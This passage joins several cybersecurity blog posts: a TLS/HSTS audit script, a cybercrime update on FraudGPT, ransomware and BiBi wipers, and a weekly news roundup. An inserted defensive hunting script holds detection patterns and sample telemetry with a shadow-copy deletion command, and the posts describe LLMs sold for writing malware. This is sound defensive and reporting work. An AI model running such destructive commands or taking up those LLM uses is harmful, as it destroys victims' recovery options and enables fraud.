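        # unknown directives are ignored by browsers, so they are ignored here
    if "max-age" not in seen:
        policy.errors.append("max-age directive missing; header is invalid")
    return policy


def audit_transport(headers: Dict[str, str], ssl_protocols: str) -> List[str]:
    """Return findings for a response header map plus an nginx
    'ssl_protocols' value such as "TLSv1 TLSv1.1 TLSv1.2"."""
    findings: List[str] = []
    lowered = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    policy = parse_hsts(lowered.get("strict-transport-security"))
    findings.extend(policy.errors)
    if policy.max_age is not None:
        if policy.max_age == 0:
            findings.append("max-age=0 tells browsers to forget the HSTS policy")
        elif policy.max_age < ONE_YEAR:
            findings.append(f"max-age {policy.max_age} is under one year")
    if policy.max_age and not policy.include_subdomains:
        findings.append("includeSubDomains missing; subdomains can be downgraded")
    enabled = set(ssl_protocols.split())
    for weak in sorted(enabled & WEAK_TLS):
        findings.append(f"deprecated protocol enabled: {weak}")
    if not enabled & {"TLSv1.2", "TLSv1.3"}:
        findings.append("no modern TLS version enabled")
    return findings


# Constructed before/after configurations for the checklist reviewer.
WEAK_HEADERS = {"Strict-Transport-Security": "max-age=300"}
WEAK_PROTOCOLS = "TLSv1 TLSv1.1 TLSv1.2"
HARDENED_HEADERS = {"strict-transport-security": "max-age=63072000; includeSubDomains; preload"}
HARDENED_PROTOCOLS = "TLSv1.2 TLSv1.3"

if __name__ == "__main__":
    for label, hdrs, protos in (("weak", WEAK_HEADERS, WEAK_PROTOCOLS),
                                ("hardened", HARDENED_HEADERS, HARDENED_PROTOCOLS)):
        print(label, audit_transport(hdrs, protos) or "no findings")
```

Run it as-is and the weak configuration yields four findings (short `max-age`, no `includeSubDomains`, and two deprecated protocol versions) while the hardened one yields none. A missing header and `max-age=0` are reported separately because they mean different things: the first is a site that never opted in, the second is a site actively telling browsers to drop a policy they had cached.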

Conclusion

From email scams and social engineering to spoofed websites and malvertising, the eCommerce landscape is rife with potential threats, especially during the most festive time of year. The surge in online activities, especially during Cyber Week, attracts not only eager shoppers but also opportunistic cyber threat actors aiming to exploit the spike in traffic.

For businesses, fortifying endpoint security involves implementing advanced detection and monitoring solutions, regularly updating software, and enforcing strict access controls. Protecting sensitive data demands comprehensive identity security measures, including MFA and user behavior analytics.

Shoppers, too, play a pivotal role in their own online safety. Utilizing secure and updated devices, being wary of phishing attempts, and ensuring secure connections during transactions are essential for the upcoming long weekend. Adopting strong, unique passwords for each online account and enabling MFA adds an extra layer of defense against unauthorized access. Regularly monitoring bank statements for suspicious transactions is a proactive step that can help detect and mitigate potential fraud.

Businesses strengthening their platforms this season rely on SentinelOne’s AI-powered security platform to defend against today’s most advanced threats. To learn more about a solution that covers multiple attack surfaces, contact us today or book a demo.

Nov 2023 Cybercrime Update | LLMs, Ransomware and Destructive Wipers Proliferate in Recent Attacks

In this blog post, we delve into the notable trends shaping the cyber threat landscape over the past month. Hot topics this month revolve around the expanding use of generative AIs by cybercriminals, the ongoing surge of ransomware campaigns, and the latest developments in cyber warfare related to the Israel-Hamas war.

Crimeware Scene Continues to Explore Advantages of LLMs

AI-centric tools and services continue to emerge, with a number of notable developments since our October 2023 update. Though a relatively new market for threat actors, the types of services on offer are evolving quickly.

One tool that has emerged in recent weeks is FraudGPT, which advertises itself as “Not just a GPT LLM, but an all inclusive, testing, cracking, action and access tool” with the ability to “Generate scam emails, identify malicious code, and uncover leaks and vulnerabilities in seconds”.

Combining an LLM with other tooling creates real potential for automated harm. For example, FraudGPT is advertised with an integration to an expanding CVE database, which would let attackers check whether targets are exposed to known software bugs and tailor their operation through simple text prompts.

FraudGPT

For cybercriminals, the cost is not prohibitive. One FraudGPT seller offers subscription options ranging from 89.00 euros per month to a 749.00 euro “Lifetime Pro” option. Customized private builds are also advertised at prices starting from 1899.99 euros.

WolfGPT is another tool for sale offering similar functionality. Its feature set includes:

  • Generation of malware and ransomware
  • Automated writing of scam emails
  • Automated writing of “fake news and misinformation”
  • Vulnerability discovery
  • Multiple AI models
  • Unlimited Characters
  • Privacy and performance focused

So-called “Lifetime” licenses for the current version of WolfGPT go for USD $300.

WolfGPT

Ransomware Hits Financial, Education and Healthcare Sectors

China’s largest bank, ICBC, was extorted by LockBit, it was reported this month. The attack on the Industrial and Commercial Bank of China is notable given the sheer size and position in the world economy that the ICBC holds. According to sources, the ICBC’s U.S. unit was impacted to such an extent that trades representing “billions of US dollars” had to be settled by carrying information on USB sticks, as its computer systems were isolated from the rest of Wall Street.

Elsewhere, an attack on the Toronto Public Library has been attributed to Black Basta ransomware group. The attack is said to have led to “significant disruptions” as all internal systems went down in response to the incident.

In early November 2023, JAE (Japan Aviation Electronics) was targeted by ALPHV (aka BlackCat).

ALPHV and JAE

Among other attacks attributed to the ALPHV group this month is a claim to have infiltrated Dragos, a cybersecurity provider focused on industrial control systems.

ALPHV and Dragos Inc

Confirmation of this attack remains uncertain at the time of writing. A post briefly appeared on the ALPHV blog on November 11, 2023 claiming that Dragos had been breached, but that has since been removed.

In September’s update we reported on the activities of Ransomed.VC. This group has now ceased operations. The developer(s) posted on Telegram and other forums claiming that:

“The project ransomedvc is up for sale…I do not want to continue running the project due to personal reasons, none will be disclosed to journalists, don’t even ask. We are selling everything”

The operator was asking for USD $10 million for its clearnet and TOR domains, ransomware builders and source, affiliate group access, and social media accounts.

However, a subsequent message claimed that members of its group had been arrested and that the entire operation was being shut down due to the risks.

Updated Ransomed.VC statement

That said, the operator continues to solicit interest in a new private project via the same Telegram channel, so watch this space.

Israel-Hamas Conflict | Destructive Wipers Begin to Emerge

As we saw during the early stages of the Russian invasion of Ukraine, cyber warfare actors were quick to begin destructive wiper campaigns. A similar trend is now being seen in the Israel-Hamas war.

Between October 30th 2023 and November 2nd 2023, a series of wipers began targeting systems across Israel. The wipers, collectively known as “BiBi” wipers, are designed to resemble ransomware but in fact simply overwrite the victim’s data, with no possibility of recovery. In some of the early variants seen, affected files are renamed with a .BiBi1 file extension.

Variants for both Linux and Windows systems have been noted. When launched, all accessible files are overwritten, including core OS files and data. The malware accepts an option that lets the attacker specify a target directory for wiping instead of the entire machine.

SHA1: 24f6785ca2e82d1d1d61f4cb01d5e753f80445cf (VirusTotal)

The malware also executes commands designed to prevent interruption of execution and to hinder attempts at recovery through deletion of the system VSS backups.

Additionally, on November 13, 2023, Israel’s CERT published an alert with details and indicators of further wiper attacks, including the following suspected wiper hashes:

27e28737415e9d6a45b5afb03c7b33038df8f800
44f2e8860e2935e900446dc5dea31508c71701ff
48bc39011e06931b319d873a4d2a0cff5b119cdf

These most recent wipers are attributed to Iranian threat actors (BlackShadow aka DEV-0022).
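The behaviour described above (bulk renames to a .BiBi extension, followed by deletion of shadow copies to hinder recovery) and the hashes listed from the early sample and the CERT alert give a hunter two independent signals. The following is an added example, not code from the original post or from SentinelOne: it runs both checks over a handful of constructed endpoint telemetry records. The SHA1 values are the ones printed in the text; the specific recovery-inhibition command lines (`vssadmin delete shadows`, `wmic shadowcopy delete`, `bcdedit ... recoveryenabled no`) are commands commonly used by ransomware and wipers and are assumed here, since the post does not quote the commands the BiBi wipers run. The rename threshold and time window are illustrative tuning values.

```python
"""Hunt for BiBi-style wiper activity in endpoint telemetry.

Added example, not from the original post. Two checks:
  1. hash match against the SHA1 indicators listed in the post;
  2. behaviour match: a burst of renames to a .BiBi<N> extension from one
     process, and recovery-inhibition command lines (assumed, see lead-in).
All telemetry records below are constructed for illustration.
"""
import re
from collections import defaultdict
from typing import Dict, List

# SHA1s quoted in the post: the early sample plus the three from Israel's CERT alert.
WIPER_SHA1 = {
    "24f6785ca2e82d1d1d61f4cb01d5e753f80445cf",
    "27e28737415e9d6a45b5afb03c7b33038df8f800",
    "44f2e8860e2935e900446dc5dea31508c71701ff",
    "48bc39011e06931b319d873a4d2a0cff5b119cdf",
}
BIBI_EXT = re.compile(r"\.bibi\d+$", re.IGNORECASE)       # matches .BiBi1, .BiBi2, ...

# Assumed recovery-inhibition commands (typical of ransomware and wipers generally).
RECOVERY_KILL = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
    re.compile(r"bcdedit(\.exe)?.*recoveryenabled\s+no", re.IGNORECASE),
]
RENAME_THRESHOLD = 5     # renames from one pid inside the window to call it a burst
WINDOW_SECONDS = 60


def hash_hits(events: List[Dict]) -> List[Dict]:
    """Process starts whose image hash is a known wiper indicator."""
    return [e for e in events
            if e.get("type") == "process_start"
            and e.get("sha1", "").lower() in WIPER_SHA1]


def recovery_kill_hits(events: List[Dict]) -> List[Dict]:
    """Process starts whose command line deletes shadow copies or disables recovery."""
    return [e for e in events
            if e.get("type") == "process_start"
            and any(p.search(e.get("cmdline", "")) for p in RECOVERY_KILL)]


def rename_bursts(events: List[Dict]) -> Dict[int, int]:
    """Map pid -> largest number of .BiBi renames seen within WINDOW_SECONDS.
    Only pids reaching RENAME_THRESHOLD are returned."""
    by_pid: Dict[int, List[int]] = defaultdict(list)
    for e in events:
        if e.get("type") == "file_rename" and BIBI_EXT.search(e.get("new_path", "")):
            by_pid[e["pid"]].append(e["ts"])
    bursts: Dict[int, int] = {}
    for pid, stamps in by_pid.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):            # sliding window over timestamps
            while stamps[end] - stamps[start] > WINDOW_SECONDS:
                start += 1
            size = end - start + 1
            if size >= RENAME_THRESHOLD:
                bursts[pid] = max(bursts.get(pid, 0), size)
    return bursts


def triage(events: List[Dict]) -> List[str]:
    """Human-readable findings from all three checks."""
    findings = []
    for e in hash_hits(events):
        findings.append(f"known wiper hash on pid {e['pid']}: {e['sha1']}")
    for e in recovery_kill_hits(events):
        findings.append(f"recovery inhibition by pid {e['pid']}: {e['cmdline']}")
    for pid, n in rename_bursts(events).items():
        findings.append(f"{n} .BiBi renames from pid {pid} within {WINDOW_SECONDS}s")
    return findings


# Constructed telemetry: one wiper process, a benign rename, and an unrelated process.
SAMPLE_EVENTS = [
    {"type": "process_start", "ts": 99, "pid": 4120, "image": r"C:\Users\Public\bibi.exe",
     "sha1": "24F6785CA2E82D1D1D61F4CB01D5E753F80445CF", "cmdline": r"C:\Users\Public\bibi.exe"},
    {"type": "file_rename", "ts": 100, "pid": 4120, "new_path": r"C:\Data\q3-report.docx.BiBi1"},
    {"type": "file_rename", "ts": 101, "pid": 4120, "new_path": r"C:\Data\ledger.xlsx.BiBi1"},
    {"type": "file_rename", "ts": 102, "pid": 4120, "new_path": r"C:\Data\notes.txt.BiBi1"},
    {"type": "file_rename", "ts": 103, "pid": 4120, "new_path": r"C:\Data\photo.jpg.BiBi1"},
    {"type": "file_rename", "ts": 104, "pid": 4120, "new_path": r"C:\Data\backup.zip.BiBi1"},
    {"type": "file_rename", "ts": 500, "pid": 4120, "new_path": r"C:\Data\late.pdf.BiBi1"},
    {"type": "file_rename", "ts": 105, "pid": 900, "new_path": r"C:\Users\alice\notes.bak"},
    {"type": "process_start", "ts": 106, "pid": 4121, "image": r"C:\Windows\System32\vssadmin.exe",
     "sha1": "0000000000000000000000000000000000000000",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process_start", "ts": 107, "pid": 2001, "image": r"C:\Windows\explorer.exe",
     "sha1": "1111111111111111111111111111111111111111", "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Against the sample the hash check fires once, the shadow-copy deletion fires once, and the rename burst is reported as five events rather than six because the sixth rename falls outside the 60-second window. The hash check is the cheapest but also the most brittle, since any rebuilt sample defeats it; the rename burst is what an analyst should expect to survive across variants, including the Linux build, where the extension pattern rather than a Windows-specific command line is the durable signal.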

Conclusion

The cybercrime ecosystem continues to explore the use of LLMs, with more offerings of AI-powered tools designed to lower the barrier to entry into cybercrime and make attacks more efficient. Meanwhile, ransomware actors like LockBit and ALPHV have been actively attacking some big name targets as well as public sector healthcare and education providers. The emergence and deployment of multiple variants of wiper malware, while not entirely surprising, represents a new development in cyber threat activity related to the Israel-Hamas war. As past conflicts have shown, such cyber weapons have a very real possibility of affecting targets far from those initially intended.

In the face of these emerging trends, employing a comprehensive security solution like Singularity XDR, which leverages AI and automated remediation, can serve as a potent weapon in an organization’s cybersecurity arsenal. It’s more crucial than ever to stay ahead of the curve, adopting proactive measures that help detect and mitigate threats before they can inflict significant damage.

To learn more about how SentinelOne can help defend your organization’s endpoint, cloud, and network assets, contact us or request a free demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 46

The Good | FBI Takes Down IPStorm Botnet

A botnet that had been running since 2019, infecting thousands of internet-connected devices around the world, has been taken down, the FBI said this week. IPStorm was operated by Sergei Manikin, a Russian and Moldovan national, who has pleaded guilty to three counts of computer fraud.

Unlike traditional botnets, IPStorm used a peer-to-peer network protocol known as Interplanetary File System (IPFS) to store and share data in a distributed file system, making it more resilient and harder to disrupt. Infected devices were turned into proxies for malicious activity by clients that Manikin sold access to through his public websites proxx.io and proxx.net.

By routing their internet traffic through the botnet, clients could conduct malicious activities anonymously. According to the FBI, customers paid hundreds of dollars a month to rent access to the botnet. Manikin is thought to have had over 23,000 paying customers and admitted to banking at least half a million dollars from the scheme.

ipstorm botnet

Initially targeting Windows systems, over the years IPStorm expanded to targeting most major platforms, including macOS, Linux and Android devices across Asia, Europe and both North and South America, infecting at least 13,500 devices.

In announcing the takedown, the FBI said that it had dismantled Manikin’s infrastructure, but its actions did not extend to informing victims or removing the botnet malware from infected devices.

The Bad | Educational Startup Turned Into Cyber Espionage Actor

Research from Reuters and SentinelLabs this week revealed how an educational startup that began life teaching coding skills rapidly transformed into a global cyber espionage threat actor. Reuters revealed how Appin Security Group became a significant player in the Hack-for-Hire business and allegedly engaged in multiple high-profile hacks.

The company, founded by Rajat and Anuj Khare, was formed in 2003, and began as an educational outfit offering technology training courses in programming, robotics and cybersecurity. Between 2009 and 2013, the company was involved in offering offensive security and hack-for-hire operations.

Representatives of the Khares have denied engaging in illicit activities; however, researchers say that Appin developed a comprehensive set of hacking tools for spying, compromising email accounts and advanced social engineering. High-profile operations included targeting Russian oligarch Boris Berezovsky, Malaysian politician Mohamed Azmin Ali, and Kristi Rogers, wife of then U.S. House Intelligence Committee Chairman Mike Rogers.

According to the research, Appin’s success was built on a sophisticated approach to managing and acquiring infrastructure, including purchasing mobile spyware from external contractors as well as developing in-house hacking tools, exploits and malware. The company offered clients an easy-to-use portal where they could make and manage requests for hacking operations.

Source: Reuters

SentinelLabs said that better international cooperation and legal frameworks were needed to effectively address the problem of private sector offensive actors, a market which has burgeoned in recent years in light of advancing technologies and growing demand for digital espionage services. Governments, businesses and high-profile individuals need to proactively protect themselves against such formidable actors.

The Ugly | ALPHV Files SEC Complaint Against Victim

Ransomware actor ALPHV has taken extortion to the next level by filing a complaint with the Securities and Exchange Commission (SEC) against one of its victims, MeridianLink, whose data is listed on the ALPHV leak site.

According to reports, representatives of ALPHV say they breached MeridianLink on November 7th, in a data theft operation without ransomware. The attackers say the victim became aware of the breach the same day, but did not inform the SEC within 4 days – a new requirement that has yet to come into force. MeridianLink has since stated that the attack only came to light three days later on November 10th.

It seems unlikely that the complaint – filed under Item 1.05 of Form 8-K – will be upheld. Aside from the fact that MeridianLink disputes the date when it became aware of the breach, the rules are not set to come into effect until December.

It has been reported that MeridianLink was quick to patch the vulnerability used in the breach but has not proceeded with any ransom negotiations to date. The filing of the SEC complaint may be an attempt to generate more publicity about the breach, putting pressure on the victim by way of raising concerns about the stolen data among its clients and partners.

The incident underscores the lengths threat actors will go to achieve a payout. Extortion of businesses that fail to adequately secure their networks has developed rapidly since the initial phase of ransomware as simple file lockers. Data exfiltration and double extortion through leveraging public perception is the new playbook. Bringing regulatory compliance into the mix may be a little premature in this case, but the message to businesses should be clear: prevention is the primary cure in enterprise security.